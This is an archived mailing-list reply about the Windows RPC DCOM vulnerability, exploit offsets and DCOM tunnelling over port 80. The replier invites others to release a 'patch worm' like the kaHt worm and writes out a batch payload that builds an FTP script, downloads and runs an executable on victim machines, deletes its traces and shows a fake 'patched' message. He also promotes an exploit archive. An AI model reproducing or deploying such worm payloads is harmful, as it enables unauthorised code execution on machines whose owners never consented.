Re: rpcdcom Universal offsets

[w g <xillwillx () yahoo com>]

there is no exploit code attached to your message... i too have the universal offsets for win2k and xp wondering if we 
can match them... also i was informed from an associate by the handle of 'harq'  that dcom is also bound to port 80
 
"Component Object Model (COM) Internet Services (CIS) introduces support for a new Distributed COM (DCOM) transport 
protocol known as Tunneling Transmission Control Protocol (TCP) that allows DCOM to operate over TCP port 80. This 
allows a client and a server to communicate in the presence of most proxy servers and firewalls, thereby enabling a new 
class of COM-based Internet scenarios."
 
which also opening a new can off worms for routered servers... any takers on releasing a patch worm?? something to the 
effect of the kaHt webdav worms code
echo open a">ftp.microsoft.com>a
echo ftp>a
echo >a">a@>>a
echo bin>>a
echo get DCOM_HOTFIX.exe>>a
echo bye>>a
ftp -a:a
DCOM_HOTFIX.exe /install
del a
net send localhost Vunerable SERVER PATCHED. Please Reboot NOW.
exit
::blackhat snicker:::

illwill
http://illmob.org
http://illmob.org/rpc for the most updated dcom exploit archive

Sami Dhillon <sami_dhillon () yahoo com> wrote:
Hi i found these offsets after so much tiring work anyways here is my first post with my proof of concept code i did 
tried on my network and all worked so please check and send me the suggestions and improvements 
thank you 
 Sami Anwer Dhillon




---------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software


---------------------------------
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.